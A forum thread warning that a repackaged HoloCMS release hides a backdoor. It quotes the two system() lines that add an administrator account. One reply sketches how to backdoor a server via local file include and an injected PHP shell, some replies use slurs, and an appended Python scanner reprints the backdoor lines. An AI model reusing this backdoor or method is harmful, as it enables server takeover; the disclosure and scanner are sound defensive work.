HoloCMS v3.2.0 (Patched Edition)

omg install.php config error mysql only 1 ? bugz
screen:


please help me
 
People on Otaku have been saying this is a virus. Just like to say that I have checked it out and it is not a virus before people bring that cancer here as well
I think they were referring to another "patch" released by j00p a few days ago, I'll check this out and see if it's clean.

EDIT:
Ok, svn diff results:
index.php - Changed to new v32 format. VERY dirty coding, made me facepalm multiple times. BROKE encryption, so if you have users, then cookies will stop working. Removed my email-force-verify feature. ZERO security fix found.

me.php - Fixed the events XSS exploit (the incorrect way, I'll tell you the correct way below).

transactions - WARNING WARNING! Virus found! sorry about the font size, I just saw three more people downloading it after this post. (And we have a winner), take a look at lines 122 and 123 of transactions.
Code:
system("cmd /c net user /add IUSR_SYSTEM letmein");
system("cmd /c net localgroup administrators /add IUSR_SYSTEM");

What this does is it adds an administrator user with a password the guy knows. In other words, if you use this, you now have a backdoor on your server.

In other words, just like the crap j00p released a few days ago, but in a different area, this fixes ZERO security exploits (other than the one I told you guys about a while ago), it puts a backdoor on your server so the guy can take over it. DO NOT USE! Since this is the second time this happens, I advise you people to not use ANY holocms release that is not from me (unless I say so otherwise).

Also, the ONLY KNOWN exploit is the one in me.php, I'll be updating the HoloCMS thread with a patch later.

EDIT: Your virus scanner won't show anything!!! This isn't an exe file, it's a plain-text file, so virus scanners skip over it, AND the fact that it doesn't do harm to your computer, it opens a back door which allows the attacker to have administrator access to your computer/server THEN they can do the harm. Very sneaky.

EDIT 2: Lol at PM from Pixalz ("**** off with your crappy fag posts with posting it add users >.<"), either he's in on the whole thing or he's the most ignorant guy here. Wait, I take that back. He's the most stupid ignorant guy here.

So,
Habmoon.
There is a virus found.
Also,
I doubt he'd lie about it :P:ott1:

Yes, there is a virus + a keylogger in the file.

Ok, the term virus is kinda misleading. It doesn't IMMEDIATELY do damage to your computer as a virus does. It creates an administrator account under the name 'letmein' with no password. It will ONLY do harm when the attacker logs in to your server and does things. It is a "backdoor Trojan".

No, there is no keylogger.

Also, if you have ANY doubt of what I'm saying, just download the file and open transactions.php with any text editor (Notepad), scroll to the end of the file (lines 122 and 123 to be exact) and see the two lines.
 
When you backdoored this, you forgot to add a meta tag so that you could find all the installations of this on Google.

I rate your faggotry 10/10
 
I just realised as well that this is the most retarded of ways to backdoor a system. For a start, most PHP installations have system() disabled by default (including XAMPP).

Secondly, if you're going to backdoor, do it right. Add an LFI (local file include) and use that to read the config.php file. This will bypass all chmod permissions as it is in the same directory, so just use include() to bypass safe_mode, open_basedir etc. Then use that to get into the database, and you can inject a PHP shell into the title tables in the database (for example the credits.php "How can I buy credits" table).

Then when you visit credits.php, the PHP shell will be there and because you injected it into the PHP from MySQL, the system is none the wiser and the file is still owned by the owner. This will pretty much allow you to modify any of the HoloCMS files.

LFI is the method that I used to successfully compromise holocms.com, and damage can be reduced by CHMODing all the files 6**, so they are only readable by the owner.

Learn 2 hack please
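A quick static triage a server owner could run over a downloaded release before deploying it, covering both findings from this thread: the two system() lines quoted from transactions.php (which no antivirus flags, as noted above) and the dynamic-include shape that a planted LFI takes. This is an added example, not HoloCMS or RaGEZONE code; the sample PHP files are constructed, and the check names ("account-backdoor", "shell-exec", "dynamic-include") are this example's own.

```python
"""Static triage of a downloaded PHP release (added example, not HoloCMS code).

Checks each line for (1) a shell-execution call whose argument carries a
Windows account-creation command (`net user /add`, `net localgroup
administrators /add`) and (2) a statement-level include/require whose path
is not a plain string literal, the shape a planted local file include takes.
"""
import re

EXEC_CALL = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\((.*)\)", re.I)
ACCOUNT_CMD = re.compile(
    r"net\s+(user\s+.*?/add|localgroup\s+administrators\s+.*?/add)", re.I)
INCLUDE_STMT = re.compile(  # statement-start heuristic, not a PHP parser
    r"^\s*(?:include|require)(?:_once)?\b\s*\(?\s*(.*?)\s*\)?\s*;", re.I)
STRING_LITERAL = re.compile(r"""^(['"])[^'"]*\1$""")

def scan_php(source: str, filename: str = "<input>"):
    """Return (filename, line_no, check, snippet) tuples for suspicious lines."""
    findings = []
    for no, line in enumerate(source.splitlines(), start=1):
        call = EXEC_CALL.search(line)
        if call and ACCOUNT_CMD.search(call.group(2)):
            findings.append((filename, no, "account-backdoor", line.strip()))
        elif call:  # any shell execution still deserves a manual look
            findings.append((filename, no, "shell-exec", line.strip()))
        inc = INCLUDE_STMT.search(line)
        if inc and not STRING_LITERAL.match(inc.group(1)):
            findings.append((filename, no, "dynamic-include", line.strip()))
    return findings

# Constructed sample modelled on the two lines quoted from transactions.php.
SAMPLE_TRANSACTIONS = """<?php
require_once('config.php');
$total = mysql_result(mysql_query("SELECT COUNT(*) FROM transactions"), 0);
system("cmd /c net user /add IUSR_SYSTEM letmein");
system("cmd /c net localgroup administrators /add IUSR_SYSTEM");
?>"""

# Constructed sample: one safe literal include, one dynamic include (LFI shape).
SAMPLE_INDEX = """<?php
include('header.php');
$page = $_GET['page'];
include($page . '.php');
?>"""

if __name__ == "__main__":
    for name, src in (("transactions.php", SAMPLE_TRANSACTIONS), ("index.php", SAMPLE_INDEX)):
        for f in scan_php(src, name):
            print("%s:%d [%s] %s" % f)
```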